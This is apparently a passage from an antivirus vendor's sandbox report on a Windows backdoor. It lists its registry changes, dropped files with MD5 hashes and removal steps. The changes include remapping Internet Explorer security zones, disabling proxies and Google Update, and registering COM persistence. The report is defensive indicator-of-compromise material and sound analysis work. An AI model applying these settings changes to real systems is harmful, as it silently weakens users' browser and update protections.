[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:188 makes changes in the system registry.


The Backdoor creates and/or sets the following values in system registry:

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Policies\Google\Update]
"Update{8A69D345-D564-463C-AFF1-A69D9E530F96}" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3CCAC59C-6F9D-4545-EACD-568494150D4E}]
"InstallDate" = "20150509"

[HKLM\SOFTWARE\Policies\Google\Update]
"AutoUpdateCheckPeriodMinutes" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3CCAC59C-6F9D-4545-EACD-568494150D4E}]
"DisplayIcon" = "%System%\msiexec.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3CCAC59C-6F9D-4545-EACD-568494150D4E}]
"CategoryName" = "Apps"

[HKLM\SOFTWARE\Policies\Google\Update]
"DisableAutoUpdateChecksCheckboxValue" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3CCAC59C-6F9D-4545-EACD-568494150D4E}]
"UninstallString" = "%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.exe /s /n /i:ExecuteCommands;UninstallCommands"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3CCAC59C-6F9D-4545-EACD-568494150D4E}]
"DisplayName" = "BrrOwsiNGclEarly"

"ProductName" = "BrrOwsiNGclEarly"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Setup\6.0]
"DoNotOfferIE6" = "1"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F9 F2 FF CC 16 67 EB 1A 69 B1 07 24 17 C6 05 E8"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Setup\6.0]
"DoNotOfferIE6AU" = "1"
"DoNotAllowIE6" = "1"

[HKLM\SOFTWARE\Policies\Google\Update]
"UpdateDefault" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3CCAC59C-6F9D-4545-EACD-568494150D4E}]
"NoModify" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3CCAC59C-6F9D-4545-EACD-568494150D4E}]
"SilentUninstall" = "%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.exe /s /n /i:ExecuteCommands;UninstallCommands"
"NoRepair" = "1"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"

[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Backdoor deletes the following registry key(s):

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Programmable]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:1016 makes changes in the system registry.


The Backdoor creates and/or sets the following values in system registry:

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3112BDB8-7DB9-279D-EC5F-30BC1ABC266C}]
"ProductName" = "Chime"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 22 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Policies\Google\Update]
"Update{8A69D345-D564-463C-AFF1-A69D9E530F96}" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3112BDB8-7DB9-279D-EC5F-30BC1ABC266C}]
"NoModify" = "1"

[HKLM\SOFTWARE\Policies\Google\Update]
"AutoUpdateCheckPeriodMinutes" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3112BDB8-7DB9-279D-EC5F-30BC1ABC266C}]
"UninstallString" = "%Program Files%\Chime\Chime.exe /s /n /i:ExecuteCommands;UninstallCommands"

[HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]
"ap" = "-dev-multi-chrome"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"ap" = "2.0-dev-multi-chrome"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3112BDB8-7DB9-279D-EC5F-30BC1ABC266C}]
"InstallDate" = "20150509"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Policies\Google\Update]
"DisableAutoUpdateChecksCheckboxValue" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3112BDB8-7DB9-279D-EC5F-30BC1ABC266C}]
"CategoryName" = "Apps"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3112BDB8-7DB9-279D-EC5F-30BC1ABC266C}]
"NoRepair" = "1"

"DisplayIcon" = "%System%\msiexec.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\CCC0\temp\%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 4B B3 27 69 E7 96 8C 9C 2F D3 6F 20 3D 01 25"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3112BDB8-7DB9-279D-EC5F-30BC1ABC266C}]
"SilentUninstall" = "%Program Files%\Chime\Chime.exe /s /n /i:ExecuteCommands;UninstallCommands"

[HKLM\SOFTWARE\Policies\Google\Update]
"UpdateDefault" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3112BDB8-7DB9-279D-EC5F-30BC1ABC266C}]
"DisplayName" = "Chime"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"

[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Backdoor deletes the following registry key(s):

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Programmable]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process rundll32.exe:1432 makes changes in the system registry.


The Backdoor creates and/or sets the following values in system registry:

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"a1dcff5b" = "V/////%%"
"0dc3ee96" = "/P////%%"
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
"a2e3b941" = "///%"
"6185d035" = "Vx/2/Cx/V//l////"
"d1abcdb6" = "///%"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"f0bf0bde" = "///%"
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
"c6c5dd44" = "V/////%%"
"587b5709" = "V/////%%"
"7367429f" = "///%"
"27ddcf6f" = "///%"
"48bd1aff" = "V/////%%"
"37b7a6d8" = "UlAr/XJ/c//k////"
"e8f9dcc7" = "UlAr/XJ/c//k////"
"c24899a6" = "VP/g/CV/Vl/2/Cx////%"
"fe94ce1e" = "V/////%%"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"f1f24e29" = "Vl/l/C/////%"
"7f69fa1f" = "///%"
"f2c53c49" = "UlAr/XJ/c//k////"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"370856c7" = ""

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"2e22d94e" = "///%"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"3efeb33e" = ""

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"
"c5705860" = "Vx////%%"
"8b9e4cbc" = "V/////%%"
"c99a5f5c" = "///%"
"3c09c42b" = "///%"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F3 A6 62 68 D8 F2 D2 66 8E 39 88 BD C0 BD DF 21"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"51d2f2ea" = "PPAf/Xh/alAf/XJ/bxAR/Xt/blAu////"
"0e93c3f3" = "///%"
"65114b36" = "Vl/l////"
"e46c271e" = "///%"
"0c230bcb" = "///%"
"72758a5d" = "///%"
"bbf88800" = "///%"
"a0743acc" = "N/////%%"
"2d71d5ab" = "V/////%%"
"38583bc3" = "Ml/2/CF/M//g/CZ////%"
"f6ad6fa6" = "V/////%%"
"340d3099" = "/P////%%"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"iiid" = "1"

[HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"1520c6f1" = "V/////%%"
"414bc593" = "///%"

The process rundll32.exe:1196 makes changes in the system registry.


The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1C B3 A7 58 2D 80 17 B5 4A FC 58 61 A2 3F 52 45"

Dropped PE files

MD5 File path
79f9311ac6a5009fef1a5756a0a529d3c:\Program Files\ActiveCoupon\ActiveCoupon.exe
d6afed6a20c3343acb878ffa399f538bc:\Program Files\BrrOwsiNGclEarly\pbk7K2hRvvulDG.dll
9f6c52eec607111136cd222b02bf0530c:\Program Files\BrrOwsiNGclEarly\pbk7K2hRvvulDG.exe
9f6c52eec607111136cd222b02bf0530c:\Program Files\Chime\Chime.exe
4277381dbc9bf652805dad7fc0527793c:\Program Files\WWhiteCouPooni\7qwHG4CXj1mdR3.dll
9f6c52eec607111136cd222b02bf0530c:\Program Files\WWhiteCouPooni\7qwHG4CXj1mdR3.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.

Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    regsvr32.exe:1932
    regsvr32.exe:1980
    ArmorerRise.xyz.exe:2036
    %original file name%.exe:1176
    %original file name%.exe:1988
    %original file name%.exe:368
    %original file name%.exe:1888
    %original file name%.exe:188
    %original file name%.exe:1016
    rundll32.exe:1432
    rundll32.exe:1196

  2. Delete the original Backdoor file.
  3. Delete or disinfect the following files created/modified by the Backdoor:

    %Documents and Settings%\%current user%\Local Settings\Temp\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}-log.txt (57034 bytes)
    %Program Files%\TailCutter\TailCutter.dll (80814 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (7972 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3e01bea6\temp.ca.part (71639 bytes)
    %Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.tlb (13 bytes)
    %Documents and Settings%\All Users\Application Data\17537857206796671995\a6316e1ae4dae3cab1ad0965983a8e70.ini (517 bytes)
    %Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.exe (1504 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\7C30\images\loader.gif (2 bytes)
    %Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.dat (42 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\9Bgp6JPux0JTfR[1].ca (129298 bytes)
    %Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.dll (6700 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\7C30\images\progressbar.gif (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\2UzDN7fW9Yl4sH[1].ca (65187 bytes)
    %Program Files%\ActiveCoupon\ActiveCoupon.exe (2486 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1818da5e\temp.ca.part (38114 bytes)
    %Documents and Settings%\All Users\Application Data\17537857206796671995\2e3398c745d7293bb1ad0965983a8e70.ini (294 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\478\images\progressbar.gif (15 bytes)
    %Program Files%\ActiveCoupon\ActiveCoupon.dat (312 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\478\images\loader.gif (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CCC0\images\progressbar.gif (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\bg.ca.part (6 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Startup\874a6a15d18c264327f5c81ec98e2cf9.lnk (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\r1.mytholiday[1] (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\5[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CCC0\images\loader.gif (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\3.ini.tmp (21 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task(5).ini (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\2.ini.tmp (21 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\6.ini.tmp (592 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\%original file name%.exe (16544 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\2[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task(3).ini (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task.ini (6 bytes)
    %Documents and Settings%\All Users\Application Data\{c5c5d690-bdd5-c94a-c5c5-5d690bdd5a42}\874a6a15d18c264327f5c81ec98e2cf9.dat (866 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task(2).ini (6 bytes)
    %Documents and Settings%\All Users\Application Data\{c5c5d690-bdd5-c94a-c5c5-5d690bdd5a42}\%original file name%.exe (16544 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\4[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\ArmorerRise.xyz.exe (16584 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\3[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\6[1].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\5.ini.tmp (21 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\4.ini.tmp (21 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task(4).ini (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\r1.mytholiday[1] (2 bytes)
    %Documents and Settings%\All Users\Application Data\17537857206796671995\d2bec04cb91e9cb6b1ad0965983a8e70.ini (150 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\0f01cb84\temp.ca.part (31648 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\69C0\images\progressbar.gif (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Oo8yOHF14wFvBA[1].ca (29424 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\098259e7\temp.ca.part (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\69C0\images\loader.gif (2 bytes)
    %Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.dat (42 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2C80\images\progressbar.gif (15 bytes)
    %Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.dll (6665 bytes)
    %Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.exe (1504 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2C80\images\loader.gif (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\3f8b64b1\temp.ca.part (43652 bytes)
    %Documents and Settings%\All Users\Application Data\17537857206796671995\73515851bcb7cafbb1ad0965983a8e70.ini (522 bytes)
    %Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.tlb (13 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\xoL9D9NSNKXd4Z[1].ca (123415 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\1980\images\loader.gif (2 bytes)
    %Program Files%\Chime\Chime.exe (1504 bytes)
    %Documents and Settings%\All Users\Application Data\17537857206796671995\3e3e983e008005d3b1ad0965983a8e70.ini (285 bytes)
